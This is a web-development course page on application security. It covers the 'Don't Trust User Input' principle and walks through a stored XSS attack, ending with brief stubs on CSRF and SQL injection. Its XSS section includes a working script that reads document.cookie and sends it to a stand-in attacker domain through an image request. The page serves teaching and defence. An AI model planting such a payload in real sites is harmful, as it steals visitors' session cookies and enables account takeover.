# 9.9: Security

App security is an important aspect of anything that is on the internet. Depending on the type of application security could be a crucial aspect of the operation of an app.

#### Securing an App

There is no such thing as a perfectly secure web application. The most secure software application that can be made would be installed on an [air gapped computer](https://en.wikipedia.org/wiki/Air_gap_%28networking%29) in a hermetically sealed room. It would be difficult to even give input or get any output from this theoretical computer since every possible mode of interaction could introduce security vulnerabilities. \(A computer can be vulnerable if someone can simply [listen to a user typing on the computer](https://en.wikipedia.org/wiki/Acoustic_cryptanalysis)\).

Many security vulnerabilities will simply result from human behavior and for which there is no technical solution, e.g., users [writing their passwords](https://arstechnica.com/information-technology/2015/04/hacked-french-network-exposed-its-own-passwords-during-tv-interview/) on [post-its.](https://www.vice.com/en/article/qvwmx5/the-agency-that-messed-up-hawaiis-nuclear-alert-keeps-passwords-on-post-its-vgtrn)

#### Making an App Secure

The process of making an application secure involves applying industry best-practices, some of which we have already covered, such as hashing passwords. These best practices would also include organizational processes, such as limiting employees' access to sensitive company data. We won't be able to cover every single best practice here, as it also depends on which features are included into an app.

There are many resources on the web for application security:

- [OWASP](https://owasp.org/www-project-top-ten/)
- [Ruby on Rails Security](https://guides.rubyonrails.org/security.html)
- [MDN](https://developer.mozilla.org/en-US/docs/Web/Security)

#### Don't Trust User Input

The essential principle for security of web apps is: _**Don't Trust User Input**_. If this principle is followed when constructing any feature of the app then the attack surface will be reduced significantly. We'll define user input broadly as anything that the app receives in a request.

In the following examples we'll see some ways in which the user input was not treated as dangerous, which can lead to some wide-ranging consequences.

In general we'll also see that in order to exploit any security vulnerability the attacker must have comprehensive knowledge of how a web application system works, from HTTP to JavaScript, etc. That also means that in order to assure the security of an application, that person must also have a deep understanding of all levels of the application.

## XSS

XSS stands for Cross-Site Scripting. This is a vulnerability where a malicious attacker is allowed to save a snippet of JavaScript in the system that will be displayed later.

When that snippet is run on other site visitors browsers, the attacker can run a number of different kinds of insecure programs.

Here is how we would implement an XSS attack:

#### XSS Part 1 - Saving unsanitized user input

The first part of an XSS attack is the ability of an attacker to save JavaScript into the database.

```text
<script>alert('hey!')</script>
```

If we paste this HTML snippet directly into the form input it will be saved to the database.

#### XSS Part 2 - Displaying unsanitized user input

Once this "cat" record has been saved to the database, any user who navigates to a page displaying this "cat" will run the JavaScript snippet above.

#### XSS Part 3 - Capturing and sending user session cookies

Now that we have the ability to run arbitrary JavaScript for every user who visits the site, we do malicious things. One of the worst might be to steal the session cookie of any logged in user.

In order to do that we need to save a particular kind of JavaScript, one that gets a hold of the user's cookie and sends it to a server we control.

```text
<script>
var allCookies = document.cookie;

// don't do an AJAX request in case there are CORS issues
// create an image tag
var imgEl = document.createElement('img');

// settting the img src causes the browser to try and request from this domain
imgEl.src = 'http://my-bad-domain.com?'+allCookies;
</script>
```

CSRF

A request can be sent as the viewing user.

A request can be forged by an attacker.

SQL Injection

Any SQL can be run on the system.
